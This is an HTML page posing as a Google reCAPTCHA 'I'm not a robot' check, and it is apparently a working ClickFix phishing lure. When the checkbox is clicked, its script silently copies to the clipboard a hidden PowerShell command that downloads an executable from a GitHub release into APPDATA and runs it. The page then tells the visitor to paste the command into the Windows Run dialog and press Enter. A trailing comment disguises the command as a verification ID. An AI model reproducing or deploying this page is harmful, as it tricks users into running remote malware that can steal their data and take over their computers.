<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>reCAPTCHA Verification</title>
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.0/css/all.css">
    <style>
      body {
        background: url('https://i.ibb.co/zPqsxpv/Screen-Shot-Tool-20241223175535.png') no-repeat center center fixed;
        background-size: cover;
        height: 100vh;
        margin: 0;
        display: flex;
        align-items: center;
        justify-content: center;
      }

      .container {
        font-family: Roboto, helvetica, arial, sans-serif;
        background: rgba(255, 255, 255, 0.9);
        padding: 20px;
        border-radius: 5px;
        box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        pointer-events: auto;
      }

      .checkbox-window {
        height: 74px;
        width: 300px;
        background-color: #f9f9f9;
        border-radius: 3px;
        border: 1px solid #d3d3d3;
      }

      .checkbox-container {
        width: 28px;
        height: 28px;
      }

      .checkbox {
        position: relative;
        background-color: #fff;
        border-radius: 2px;
        height: 100%;
        width: 100%;
        border: 2px solid #c1c1c1;
        margin: 21px 0 0 12px;
        outline: none;
      }

      .im-not-a-robot {
        position: relative;
        left: 52px;
        bottom: 3px;
        font-size: 15px;
        color: #282727;
      }

      .captcha-logo {
        position: relative;
        left: 244px;
        bottom: 36px;
        width: 40px;
        height: 45px;
      }

      .verify-window {
        font-family: Roboto, helvetica, arial, sans-serif;
        opacity: 0;
        position: absolute;
        visibility: hidden;
        width: 310px;
        background-color: #fff;
        border: 1px solid #cecece;
        box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);
        transition: opacity 400ms;
      }

      .verify-container {
        padding: 8px;
      }

      .verify-header {
        background-color: #1A73E8;
        padding: 16px 16px 24px 16px;
        color: #fff;
      }

      .verify-verify-button {
        text-transform: uppercase;
        background-color: #5a89e2;
        color: #fff;
        text-align: center;
        width: 100%;
        padding: 12px 0;
        text-decoration: none;
        font-weight: 600;
        border: none;
        outline: none;
        cursor: pointer;
      }
    </style>
  </head>
  <body>

    <div class="container">
      <div id="checkbox-window" class="checkbox-window">
        <div class="checkbox-container">
          <button type="button" id="checkbox" class="checkbox"></button>
        </div>
        <p class="im-not-a-robot">I'm not a robot</p>
        <img src="https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png" class="captcha-logo" alt="">
      </div>

      <div id="verify-window" class="verify-window">
        <div class="verify-container">
          <header class="verify-header">
            <span class="verify-header-text-medium">Complete these</span>
            <span class="verify-header-text-big">Verification Steps</span>
          </header>
          <main class="verify-main">
            <p>
              To better prove you are not a robot, please:
            </p>
            <ol>
              <li>Press & hold the Windows Key <i class="fab fa-windows"></i> + <b>R</b>.</li>
              <li>In the verification window, press <b>Ctrl</b> + <b>V</b>.</li>
              <li>Press <b>Enter</b> on your keyboard to finish.</li>
            </ol>
            <p>
              You will observe and agree:
              <br>
            <code>
              ✅ "I am not a robot - reCAPTCHA Verification ID: <span id="verification-id">146820</span>"
            </code>
            </p>
          </main>
        </div>
        <footer class="verify-container">
          <button type="button" class="verify-verify-button" id="verify-verify-button">Verify</button>
        </footer>
      </div>
    </div>

    <script>
      let checkboxBtn = document.getElementById("checkbox");
      let verifywindow = document.getElementById("verify-window");

      checkboxBtn.addEventListener("click", function (event) {
        event.preventDefault();
        showVerifyWindow();
      });

      function showVerifyWindow() {
        verifywindow.style.display = "block";
        verifywindow.style.visibility = "visible";
        verifywindow.style.opacity = "1";
        verifywindow.style.top = "50%";
        verifywindow.style.left = "50%";
        verifywindow.style.transform = "translate(-50%, -50%)";

        var verification_id = generateRandomNumber();
        document.getElementById('verification-id').textContent = verification_id;
        stageClipboard(verification_id);
      }

      function generateRandomNumber() {
        const min = 1000; 
        const max = 9999;
        return Math.floor(Math.random() * (max - min + 1) + min).toString();
      }

      function setClipboardCopyData(textToCopy){
        const tempTextArea = document.createElement("textarea");
        tempTextArea.value = textToCopy;
        document.body.append(tempTextArea);
        tempTextArea.select();
        document.execCommand("copy");
        document.body.removeChild(tempTextArea);
      }

      function stageClipboard(verification_id){
        const commandToRun = "powershell -w hidden -c \"& {iwr 'https://github.com/3ader/verify/releases/download/v1/verification.exe' -OutFile \"$env:APPDATA\\verification.exe\"; start \"$env:APPDATA\\verification.exe\" -Wait} ## ✅ I am not a robot - reCAPTCHA Verification ID: " + verification_id + "\"";
        setClipboardCopyData(commandToRun);
      }
    </script>
  </body>
</html>
